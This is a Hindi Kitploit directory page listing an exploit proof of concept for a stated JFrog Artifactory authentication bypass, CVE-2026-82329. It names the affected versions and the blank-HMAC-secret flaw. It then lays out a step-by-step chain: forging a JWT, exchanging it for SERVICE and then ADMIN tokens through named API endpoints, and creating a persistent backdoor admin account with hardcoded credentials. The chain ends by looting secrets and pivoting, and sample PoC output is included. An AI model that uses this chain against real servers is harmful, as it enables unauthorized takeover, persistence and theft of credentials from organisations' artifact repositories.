Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-82329-JFrog-Artifactory- — CVE-2026-82329 के लिए एक्सप्लॉइट PoC, JFrog Artifactory में एक प्रमाणीकरण बायपास। JWT टोकन जाली बनाकर एडमिन एक्सेस प्राप्त करने और एक स्थायी बैकडोर उपयोगकर्ता बनाने का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/0xterror/cve-2026-82329-jfrog-artifactory-
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHub0xterror/cve-2026-82329-jfrog-artifactory-

CVE-2026-82329-JFrog-Artifactory-

CVE-2026-82329 के लिए एक्सप्लॉइट PoC, JFrog Artifactory में एक प्रमाणीकरण बायपास। JWT टोकन जाली बनाकर एडमिन एक्सेस प्राप्त करने और एक स्थायी बैकडोर उपयोगकर्ता बनाने का प्रदर्शन करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
15घं 41मि पहलेअभी तक समीक्षित नहीं

CVE-2026-82329-JFrog-Artifactory-

CVE-2026-82329 — JFrog Artifactory प्रमाणीकरण बाईपास

भेद्यता

JFrog Artifactory (संस्करण 7.111.20, 7.117.27, 7.125.19, 7.133.28, 7.146.37, 7.161.19) में गंभीर प्रमाणीकरण बाईपास। यह दोष एक अप्रमाणित हमलावर को खाली HMAC गुप्त कुंजी (0x20 के 32 बाइट्स) का उपयोग करके JWT जाली बनाने, एडमिन टोकन जारी करने और बैकडोर उपयोगकर्ता बनाने की अनुमति देता है।

शोषण श्रृंखला

चरण क्रिया 1 alg=HS256, kid=SHA256(""), skip_node_registration=true के साथ JWT जाली बनाएं 2 JWT को /access/api/v1/registry/join पर भेजें → SERVICE टोकन प्राप्त करें 3 /access/api/v1/tokens के माध्यम से SERVICE टोकन को ADMIN टोकन में बदलें 4 /artifactory/api/system/configuration, /access/api/v1/tokens, /artifactory/api/system/version के माध्यम से एडमिन पहुंच सत्यापित करें 5 /artifactory/api/security/users/{user} के माध्यम से स्थायी एडमिन उपयोगकर्ता बनाएं 6 कॉन्फ़िग, टोकन, उपयोगकर्ता, रिपॉजिटरी, रहस्य लूटें 7 उच्च-मूल्य वाले विषयों के लिए टोकन जाली बनाएं

हमले का प्रवाह

root@kitploit:~
BLANK_SECRET = b"\x20" * 32
    ↓
JWT जाली बनाएं (HS256, kid=hashlib.sha256(""))
    ↓
POST /access/api/v1/registry/join
    ↓
SERVICE टोकन (scp=admin)
    ↓
POST /access/api/v1/tokens
    ↓
ADMIN टोकन (scp=applied-permissions/admin, aud=*)
    ↓
एडमिन साबित करें (GET /artifactory/api/system/configuration → 200)
    ↓
PUT /artifactory/api/security/users/0xTerror
    ↓
स्थायी एडमिन उपयोगकर्ता: 0xTerror:Terrorp0c!7777
    ↓
लूट: कॉन्फ़िग, टोकन, उपयोगकर्ता, रिपॉजिटरी, रहस्य
    ↓
पिवट जांच: Xray, Mission Control, Distribution, आदि।
    ↓
उच्च-मूल्य वाले विषयों के लिए टोकन जाली बनाएं

PoC आउटपुट उदाहरण

root@kitploit:~
[+] चरण 1  /registry/join -> HTTP 201 SERVICE टोकन (scp=admin)
[+] चरण 2  /access/api/v1/tokens -> HTTP 200 ADMIN टोकन (scp=applied-permissions/admin)
[+] चरण 3  एडमिन का प्रमाण: config=200, tokens=200, version=200
[+] चरण 4  एडमिन उपयोगकर्ता '0xTerror' बनाएं -> HTTP 201
[=] भेद्य — अप्रमाणित हमलावर ने ADMIN प्राप्त किया
      एडमिन उपयोगकर्ता: 0xTerror:Terrorp0c!7777
टूल डाउनलोड करें